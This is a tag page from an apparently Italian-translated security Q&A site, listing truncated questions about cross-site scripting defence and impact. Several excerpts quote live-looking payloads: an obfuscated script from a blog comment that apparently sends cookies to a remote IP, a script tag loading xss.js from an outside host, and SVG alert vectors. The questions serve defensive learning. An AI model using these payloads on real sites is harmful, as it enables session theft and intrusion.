Domande con tag 'xss'

domande con tag
2
risposte

XSS su un elemento di input con style="display: none"

Supponiamo che solo le doppie virgolette fornite dall'utente siano consentite in un tag input che ha l'attributo style impostato su display: none . Qualcosa del genere: <input type="text" style="display: none;" value="aa" a...
posta 02.04.2018 - 13:13
2
risposte

Sicuro, vecchio sito di e-commerce di XSS?

Sto lavorando per un sito di e-commerce scritto in C # .net (nessun CMS utilizzato, un bel po 'di codice) in cui la sicurezza non è stata una priorità per un lungo periodo. La mia missione adesso è trovare e correggere qualsiasi violazione XSS....
posta 16.10.2017 - 10:47
3
risposte

Ho trovato codice offuscato in un commento sul mio blog. Cosa dovrei fare?

Oggi stavo controllando i commenti sul mio blog e ho trovato uno strano commento, ecco il testo esatto <script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65"...
posta 07.08.2013 - 18:02
3
risposte

La navigazione in incognito / privato impedisce gli attacchi XSS?

Quando si avvia una sessione di navigazione in incognito / privato, non dovrebbero esistere cookie provenienti da altri profili di navigazione. Ad esempio, se sono connesso a un sito nel mio profilo di navigazione principale, quindi inizio una n...
posta 21.10.2018 - 21:42
6
risposte

Soluzione per consentire l'input JavaScript ma prevenire XSS

Abbiamo un semplice sistema Blog che consente agli utenti di inserire HTML e JavaScript per creare una pagina del blog. Sono consapevole del fatto che consentire JavaScript apre la porta agli attacchi xss. Tuttavia, dobbiamo consentire agli uten...
posta 30.06.2011 - 09:20
3
risposte

Quanto sono gravi gli attacchi XSS

Un sito web che visito consente questo tipo di attacco, da implementare con GET nell'URL <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> Insieme a molti altri su questa pagina: link Il sito richiede un account (di solito a...
posta 21.10.2011 - 17:43
3
risposte

Che cosa deve fare un filtro HTML per proteggersi dagli attacchi SVG?

Recentemente ho appreso che le immagini SVG (Scalable Vector Graphics) introducono una serie di opportunità per attacchi sottili sul web. (Vedere la carta di seguito.) Mentre le immagini SVG possono apparire come un'immagine, il formato del file...
posta 31.12.2012 - 23:43
2
risposte

Perché questo vettore XSS funziona in svg ma non in HTML?

Perché questo vettore: <svg><script>alert&#40/1/.source&#41</script> funziona in link e questo <script>alert&#40/1/.source&#41</script> non lo fa. In che modo <svg> lo fa funzi...
posta 30.05.2013 - 21:47
4
risposte

Qual è il pericolo di Reflected Cross Site Scripting?

Qual è il pericolo di Reflected Cross Site Scripting? Capisco che l'XSS riflesso sia pericoloso, perché è possibile. Ma quali attacchi pratici possono essere eseguiti utilizzando Reflected XSS?     
posta 28.08.2012 - 17:59
2
risposte

I cookie dello stesso sito saranno una protezione sufficiente contro CSRF e XSS?

Devo dire che mi piace questa idea e sembra che porterà una nuova forma di protezione contro CSRF e XSS o almeno ridurrà quegli attacchi. Quindi, quanto sarà efficace questa protezione? SameSite-cookies is a mechanism for defining how co...
posta 30.04.2016 - 11:37